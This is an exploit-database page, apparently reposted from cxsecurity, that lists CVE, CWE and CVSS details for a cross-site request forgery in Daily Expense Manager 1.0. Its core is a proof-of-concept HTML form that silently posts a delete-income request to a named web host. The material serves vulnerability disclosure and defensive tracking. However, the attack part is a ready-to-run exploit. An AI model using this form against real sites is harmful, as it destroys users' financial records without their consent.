Advertisement






Daily Expense Manager 1.0 Cross Site Request Forgery

CVE Category Price Severity
CVE-2021-36297 CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-08-09
CPE
cpe:cpe:/a:daily-expense-manager:1.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080026

Below is a copy:

Daily Expense Manager 1.0 Cross Site Request Forgery
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: [email protected]
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
<form action="http://expense.adminspoint.com/homeedit.php?delincome=778" method="post">
<input type="submit" value="Click!" />
</form>
</body>
</html>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.